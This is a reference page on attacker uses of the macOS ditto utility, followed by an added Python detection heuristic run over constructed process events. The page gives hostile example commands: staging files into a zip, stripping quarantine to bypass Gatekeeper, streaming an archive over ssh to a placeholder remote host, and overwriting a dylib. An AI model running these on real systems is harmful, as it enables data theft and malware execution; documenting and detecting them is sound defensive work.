ditto
ditto is a command line utility commonly used to copy files and directories while preserving file attributes and permissions. Malicious actors can use it to collect and exfiltrate sensitive data, move laterally, or perform DLL hijacking and binary replacement attacks.
Author: Brendan Chamberlain (@infosecB)
Created: 2023-05-04
Paths
/usr/bin/ditto

Example Use Cases
Copy and compress sensitive data locally
The following command gathers and compresses (-c) files from the specified folder and writes them to a zip (-k) file.
ditto -c -k --sequesterRsrc --keepParent /home/user/sensitive-files /tmp/l00t.zip

Remove extended attributes from a file
ditto can be used to bypass Gatekeeper by removing the "com.apple.quarantine" extended attribute.
ditto -c -k unsigned.app app.zip
ditto -x -k app.zip unsigned.app 2>/dev/null

Copy, compress, and transfer sensitive data to a remote macOS host
The following command archives (-c) files from the specified folder, streams the archive to stdout (-), and pipes it over ssh to a remote host, where a second ditto extracts (-x) it from stdin into the target folder.
ditto -c --norsrc /home/user/sensitive-files - | ssh remote_host ditto -x --norsrc - /home/user/l00t

DLL hijacking
Replace a legitimate library with a malicious one while maintaining the original file permissions and attributes.
ditto -V /path/to/malicious-library/malicious_library.dylib /path/to/target-library/original_library.dylib

Detections
- No detection content at time of writing
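Added here as an illustration, not part of the original page or the LOOBins project: a small detection heuristic that flags the ditto invocation patterns listed above (archive written to a staging directory, zip extracted into an .app bundle, archive streamed over stdio, and a .dylib overwritten) when run over process-execution events. The event format, paths and users are constructed for the example.

```python
import json
import os
import shlex

# Constructed sample telemetry (not real logs): one JSON process-execution
# event per line, in the shape an endpoint sensor might emit.
SAMPLE_EVENTS = """\
{"ts":"2023-05-04T10:01:00Z","user":"alice","cmdline":"ditto -c -k --sequesterRsrc --keepParent /Users/alice/Documents /tmp/l00t.zip"}
{"ts":"2023-05-04T10:02:00Z","user":"alice","cmdline":"ditto -x -k app.zip unsigned.app"}
{"ts":"2023-05-04T10:03:00Z","user":"alice","cmdline":"ditto -c --norsrc /Users/alice/Documents -"}
{"ts":"2023-05-04T10:04:00Z","user":"root","cmdline":"ditto -V /tmp/evil.dylib /Applications/Foo.app/Contents/Frameworks/libfoo.dylib"}
{"ts":"2023-05-04T10:05:00Z","user":"_installer","cmdline":"ditto -V /tmp/pkg-stage/Foo.app /Applications/Foo.app"}
"""

# Directories commonly used to stage data before exfiltration (assumed list).
STAGING_DIRS = ("/tmp/", "/private/tmp/", "/var/tmp/", "/private/var/tmp/", "/Users/Shared/")


def classify(event: dict) -> list[str]:
    """Return the names of every heuristic the ditto command line matches."""
    argv = shlex.split(event["cmdline"])
    if not argv or os.path.basename(argv[0]) != "ditto":
        return []
    # A lone "-" means stdin/stdout, so it is a positional argument, not a flag.
    flags = {a for a in argv[1:] if a.startswith("-") and a != "-"}
    positional = [a for a in argv[1:] if not a.startswith("-") or a == "-"]
    hits = []
    if "-c" in flags and positional and positional[-1].startswith(STAGING_DIRS):
        hits.append("archive_to_staging_dir")
    if "-x" in flags and positional and positional[-1].endswith(".app"):
        hits.append("extract_into_app_bundle")  # zip round-trip can drop com.apple.quarantine
    if "-" in positional:
        hits.append("archive_streamed_via_stdio")  # pairs with "| ssh host ditto -x - ..."
    if len(positional) >= 2 and positional[-1].endswith(".dylib") and not flags & {"-c", "-x"}:
        hits.append("dylib_overwrite")  # plain copy onto an existing library path
    return hits


def scan(lines) -> list[dict]:
    """Parse JSON events and return only those that trigger at least one heuristic."""
    findings = []
    for line in lines:
        if not line.strip():
            continue
        event = json.loads(line)
        hits = classify(event)
        if hits:
            findings.append({"ts": event["ts"], "user": event["user"], "hits": hits})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS.splitlines()):
        print(finding["ts"], finding["user"], ", ".join(finding["hits"]))
```

The last sample event (an installer copying a whole .app with -V) is deliberately benign and produces no finding, which is the false-positive case a rule like this has to tolerate.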